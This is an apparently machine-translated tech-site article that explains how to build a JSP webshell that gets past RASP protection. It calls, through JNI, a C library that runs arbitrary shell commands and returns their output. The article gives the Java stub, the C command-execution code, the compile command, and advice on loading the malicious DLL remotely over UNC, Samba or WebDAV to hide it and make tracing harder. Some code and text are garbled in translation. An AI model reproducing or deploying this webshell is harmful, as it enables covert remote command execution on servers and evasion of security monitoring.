Shulou(Shulou.com)06/01 Report--

Today, I will talk to you about how JNI technology bypasses rasp protection to achieve jsp webshell. Many people may not know much about it. In order to make you understand better, the editor has summarized the following for you. I hope you can get something according to this article.

Considering that tools like rasp are based on the stack information of java and php runtimes, you can try to bypass them using jni technology. The principle of jni in the java technology stack is to use java to call c and C++ functions. The specific implementation idea is that jsp is compiled into a class file. The class calls another function in dll through jni technology to bypass the blacklist to execute commands to get the echo, which can achieve rasp and security software bypass.

Principle and use

Take the jsp webshell we are going to implement named test.jsp as an example. Because jni technology needs to generate a c header file starting with .h through the javah+.class file, jsp is a special class file, and jsp compiles the class file by Tomcat, and the naming complies with test.jsp-> > org.apache.jsp.test_jsp.class, so we need to create a new .java file whose package is org.apache.jsp and the class is test_jsp. ```package org.apache.jsp; public class test_jsp {class JniClass {public native String exec (String string);}}

Cd to the target/class directory generated by the compilation, and use the javah org.apache.jsp.test_jsp$JniClass command to generate the org_apache_jsp_test_jsp_JniClass.h file, which contains:

/ DO NOT EDIT THIS FILE-it is machine generated /

# include / Header for classorg_apache_jsp_test_jsp_JniClass /

# ifndef_Included_org_apache_jsp_test_jsp_JniClass

# define_Included_org_apache_jsp_test_jsp_JniClass

# ifdef _ _ cplusplusextern "C" {

# endif

/ *

Class: org_apache_jsp_test_jsp_JniClass

* Method: exec

* Signature: (Ljava/lang/String;) Ljava/lang/String

, /

JNIEXPORT jstring JNICALLJava_org_apache_jsp_test_1jsp_00024JniClass_exec

(JNIEnv*, jobject, jstring)

# ifdef _ _ cplusplus}

# endif

# endif calls the previous step to generate the header file and write the c language code with echo

# include "jni.h"

# include "org_apache_jsp_test_jsp_JniClass.h"

# include

# include

# include

# include

# include int execmd (const char cmd, char result)

{char buffer [102412]; / define buffer FILE pipe = _ popen (cmd, "r"); / / Open the pipe and execute the command if (! pipe) return 0; / / return 0 indicates failure to run while (! feof (pipe)) {if (fgets (buffer, 128, pipe)) {/ / output the pipe to result strcat (result, buffer);}

} _ pclose (pipe); / / close pipe return 1; / / return 1 indicates successful operation} JNIEXPORT jstring JNICALLJava_org_apache_jsp_test_1jsp_00024JniClass_exec (JNIEnv env, jobjectclass_object, jstring jstr) {const char cstr = (env)-> GetStringUTFChars (env, jstr, NULL); char result [1024 12] = "; / / defines the string array if (1 = = execmd (cstr, result)) where the results are stored

{/ / printf (result);} char return_messge [100] = "; strcat (return_messge, result); jstring cmdresult = (* env)-> NewStringUTF (env, return_messge); / / system (); return cmdresult;}}

Use gcc to compile the c source code to dll or lib (note that the jdk version is consistent with the jdk of the target machine)

Gcc-I "c:\ Program Files\ Java\ jdk1.7.0_75\ include"-I "c:\ Program Files\ Java\ jdk1.7.0_75\ include\ win32"-- shared JniClass.c-o 1.dll

There are two ways of thinking in jsp load. One is to place the jsp file and the dll in the local path of the server. The absolute path\ relative path of dll is specified in the code of jsp; the other is to use unc path, so that malicious dll can be deployed remotely to enhance the degree of concealment, increase the difficulty of source tracing, and improve the flexibility of deployment.

`

Technical key points

i. For the linux | mac environment, the java inner class generated in the previous step is called JniClass. On the unix-like platform, the loaded library name needs to start with lib + JniClass+jnilib or dylib. ii. The core system.load | loadLibrary method records the dll | lib file in the form of File. The absolute path of the dll | lib path is loaded remotely, so you need to test on the target machine to determine whether the environment supports / / or\\? The simple judgment method is new file (path), and then judge file.exist. If it is the former linux environment, you need to find a way to use the unc path of / /. It is recommended to use samba to build an anonymous access service to place the .jnilib payload. If it is the latter, that is, the target server is the java application under windows, the remote path needs to start with\\, and the dll needs to be placed under windows. If 445 is not available under the windows platform, it will access port 80 of WebD** (open webclient) and download the dll for execution. iii. The code implemented by c and C++ of jni payload should be robust to avoid the jvm collapse of the target environment. iv. Use the system function to execute commands to beware of being discovered by hids. v. This webshell has only been tested on the tomcat container.

Practical use

Tested: jdk1.7+tomcat8.5+windows environment

Jdk10+tomcat+Mac

Rasp security protection is fully open.

Rasp security protection is fully open.

The sample index.jsp is a traditional Runtime.getRuntime-based command execution.

Not surprisingly, it was logged and blocked by rasp.

Use jni to break through rasp's jsp to execute shell, successfully bypassing.

Successfully bypassed.

Use d shield to check and kill

Virustotal:

After reading the above, do you have any further understanding of how JNI technology bypasses rasp protection to achieve jsp webshell? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.